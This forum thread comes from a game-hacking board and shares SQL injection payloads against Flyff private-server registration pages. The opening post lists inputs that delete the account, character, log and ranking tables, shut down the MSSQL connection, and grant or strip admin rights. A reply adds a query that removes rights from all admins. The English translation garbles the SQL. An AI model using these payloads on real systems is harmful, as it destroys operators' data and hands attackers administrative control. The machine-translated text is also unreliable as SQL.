Register for your free account! | Forgot your password?

You last visited: Today at 05:15

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[Release] SQL Injection Befehle

Discussion on [Release] SQL Injection Befehle within the Flyff Hacks, Bots, Cheats, Exploits & Macros forum part of the Flyff category.

Reply
 
Old   #1
 
elite*gold: 30
Join Date: Oct 2010
Posts: 1,509
Received Thanks: 849
[Release] SQL Injection Befehle

Heyho,

Deutsch:

ich hab für euch mal ein paar SQL Injection Befehle rausgesucht:

Quote:
Hier stelle ich mal eine kleine Auflistung der mir bisher bekannten Sql-Injections rein!



Quote:
';delete account_tbl;--
Löscht die Accountdatenbank


Quote:
';delete character_01_tbl;--
Löscht die Characterdatenbank


Quote:
';delete logging_01_tbl;--
Löscht die Loggdatenbank


Quote:
';delete ranking_tbl;--
Löscht die Rankingdatenbank


Quote:
';shutdown;--
Schließt die MSSQL Verbindung!

Quote:
USE [CHARACTER_01_DBF]

UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='ACCOUNTID' and serverindex='01'

USE [ACCOUNT_DBF]

UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='CHARACTERNAME' and gamecode='A000'
Gibt deinen Charackter Adminrechte!

Damit kann man auch einen Admin GM oder sonstiges mit Ingamerrechten die rechte entziehen,mann muss nur jediglich die AccountID und den Characktername wissen und aus em 'Z' ein 'F' machen!


Wie das funktioniert?

Einfach den Code bei der Regristrierungsseite eingebe,wo normalerweise deine Accountid rein kommt!

Das ganze funktioniert nur, wenn die Serverbetreiber Sonderzeichen zulassen!

Das ganze wurde von Frucht auf Core geschrieben. Also Credits zu ihm!

Werde diesen Thread updaten, wenn neue bekannt sind!

English:

Quote:
Today I present a list of SQL injections!



Quote:
'; delete account_tbl ;--
Deletes the account database


Quote:
'; delete character_01_tbl, -
Deletes the character database


Quote:
'; delete logging_01_tbl, -
Clears the log database


Quote:
'; delete ranking_tbl, -
Deletes the ranking database


Quote:
'; shutdown ;--
Closes the MSSQL connection!

Quote:
USE [CHARACTER_01_DBF]

UPDATE SET CHARACTER_TBL m_chAuthority = 'Z'
WHERE m_szName = 'ACCOUNTID' and index server = '01 '

USE [ACCOUNT_DBF]

UPDATE SET ACCOUNT_TBL_DETAIL m_chLoginAuthority = 'Z'
WHERE account = 'CHARACTER NAME' and game code = 'A000'
Makes your character to the admin!

So you can also withdraw an admin or other GM Ingamerrechten with the right man only needs to know only the AccountID and Characktername and make the 'Z' a 'F'!


How does it work?

Simply enter the code in the Page tab type where normally your accountid comes in!

It works only if the Allow server operators, special symbols

The whole thing was written by fruit to score. So credits to him!

Will update this thread when new ones are announced!

Edit1: English Translation added!


Greez,

Fullscreen
Fullscreen is offline  
Thanks
12 Users
Old 11/25/2010, 19:41   #2
 
Achileus's Avatar
 
elite*gold: 74
Join Date: Apr 2009
Posts: 5,908
Received Thanks: 2,386
xD muss man das einfach in login schreiben und passwort oder wie? Wenn das so einfach währe lach ich mich tot!


Und was ist GameCode?
Achileus is offline  
Old 11/25/2010, 21:49   #3
 
elite*gold: 0
Join Date: Oct 2009
Posts: 1,389
Received Thanks: 199
Dann viel Spaß beim Lachen ,
nur jeder hat sonderzeichen raus!
Lightings is offline  
Old 11/26/2010, 13:35   #4
 
elite*gold: 30
Join Date: Oct 2010
Posts: 1,509
Received Thanks: 849
das hier ist nur für N**b Server gedacht, die zu blöd sind, dass zu fixen.
Fullscreen is offline  
Old 11/26/2010, 14:30   #5
 
Achileus's Avatar
 
elite*gold: 74
Join Date: Apr 2009
Posts: 5,908
Received Thanks: 2,386
Wollte mal Fragen für was sind die Befehle da? das man so einfach alles killen kann?



EDIT: Der Fixx ist auch einfach einfach weniger als 10 buchstaben zulassen das ist auch nen Fixx xD
Achileus is offline  
Old 11/26/2010, 21:20   #6
 
elite*gold: 30
Join Date: Oct 2010
Posts: 1,509
Received Thanks: 849
das sind SQLs, also so etwas wie Batch Dateien auf Windows. Mit ihnen kannst du Servern sagen, was sie machen sollen. Da meist nur der Admin Zugriff auf die Server Database hat, kann er nur selbst Schaden verursachen.
Auf Servern, wo Sonderzeichen gesperrt sind und deine Methode angewandt wurde, geht das nicht.

Greez,
Fullscreen is offline  
Old 12/01/2010, 11:39   #7
 
pekopon321's Avatar
 
elite*gold: 0
Join Date: May 2010
Posts: 36
Received Thanks: 3
can you translate it to english? please?
pekopon321 is offline  
Old 12/01/2010, 14:08   #8
 
elite*gold: 30
Join Date: Oct 2010
Posts: 1,509
Received Thanks: 849
Quote:
can you translate it to english? please?
Yes, sure
Fullscreen is offline  
Old 12/01/2010, 16:36   #9
 
elite*gold: 0
Join Date: Oct 2010
Posts: 7
Received Thanks: 1
ganz nett aber ich denke solche "noob" server die du da in dem text erwähnst gibt es nicht oder nur ganz wenige : ) aber dennoch ...dadurch kann mann wirklich was lernen : ) ich meine nur die leute die einen eigenen server haben ... können sicher etwas damit anfangen
mfg. Skullptura
Skullpturra is offline  
Old 12/01/2010, 21:50   #10
 
elite*gold: 0
Join Date: Aug 2010
Posts: 1
Received Thanks: 0
ja toll,bringt sich ur was ...
Quote:
if(strlen($username) < 4 ||
strlen($username) > 10
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 10</u></b> Zeichen lang sein .");
}
der 'fix' xD
azizcrank is offline  
Old 12/20/2010, 17:57   #11
 
elite*gold: -5200
Join Date: Jun 2010
Posts: 337
Received Thanks: 160
Nixda SQLi -.-
Das ist nur SQL!!
SQLi ist was ganz anderes!
.CяeαTiVe is offline  
Old 12/29/2010, 02:50   #12
 
elite*gold: 0
Join Date: Oct 2004
Posts: 362
Received Thanks: 76
Quote:
Originally Posted by .CяeαTiVe View Post
Nixda SQLi -.-
Das ist nur SQL!!
SQLi ist was ganz anderes!
will dich ja nur ungern enttäuschen... aber genau das ist sql injection^^
Steav is offline  
Old 12/29/2010, 07:06   #13
 
glitchz's Avatar
 
elite*gold: 0
Join Date: Oct 2006
Posts: 275
Received Thanks: 37
can someone that speaks english tell me what exactly this is...i cant really understand his translation
glitchz is offline  
Old 12/31/2010, 15:35   #14
 
elite*gold: 0
Join Date: May 2010
Posts: 1
Received Thanks: 0
Quote:
UPDATE CHARACTER_TBL SET m_chAuthority='F'
WHERE m_chAuthority='Z'
so kann man sehr effektiv allen Admins die Rechte nehmen... unabhängig vom Charnamen...
oberblubb is offline  
Old 01/02/2011, 15:14   #15
 
Achileus's Avatar
 
elite*gold: 74
Join Date: Apr 2009
Posts: 5,908
Received Thanks: 2,386
Wer lässt soviele buchstaben guten das einzigster was auf jeden p Server funtzt ist shutdown.
Achileus is offline  
Reply


Similar Threads Similar Threads
[Release] Einige MSSQL Befehle
02/14/2013 - Flyff PServer Guides & Releases - 55 Replies
.
[Release]Gm Ordner (Alle Gm Befehle)
09/10/2010 - Metin2 PServer Guides & Strategies - 7 Replies
Also die meisten gucken ja hier in ElitePvpers oben in den Gm Befehle nach codes.Aber die sind nicht geordnet deshalb habe ich hier mal eienn Gm Ordner mit allen befehle.Sie sind alle geordnet: Download: GM_Befehle.rar ... at ul.to - Free File Hosting, Free Image Hosting, Free Music Hosting, Free Video Hosting, ... Virusscan: http://www.virustotal.com/file-scan/report.html?i d=6e4dd48faf2f0dd03d6e90e0a2b1ca3a5bfee0ddcd21f7fe b48a2c120f02942c-1284062018 Viel Spaß
[Release]GM Befehle verbieten
07/06/2010 - Metin2 PServer Guides & Strategies - 20 Replies
Hi Comm, ich sah gerade, dass Seedleed shcon einen Thread erstellt hat, wie man GM Codes sperrt, aber den Inhalt wieder gelöscht hat. Nun zeige ich euch wie es geht. Es ist eigentlich sehr simple, ihr müsst den gm befehl in der Gamedatei suchen, nachdem ihr das gemacht habt, setzt einfach ein
Chinesiche GM Befehle + Italian Befehle...kann nix mit anfangen vllt kriegt ihrs hin.
05/18/2009 - Metin2 Private Server - 11 Replies
Blub kann damit nix anfangen villeicht wisst ihrs wenn ihr was raus habt wäre es nett wen ihrs mir per pn oder hier im Thread posten würdet bitte keine lügen oder scheiße labern sowas kann ich auf den Tod nicht ausstehen. hauter rein Thx könnt ihr geben wenns euch geholfen hat unso...naja viel spass. Finalmente commandi GM !! Metin2 --- GM COMMAND --- 測試的時候請& #20351;用香港龍駒 8204;試伺服器. 登入測試伺服& #22120;流程如下: 1.安裝香港龍駒 ;主程式



All times are GMT +1. The time now is 05:16.


Powered by vBulletin®
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2025 elitepvpers All Rights Reserved.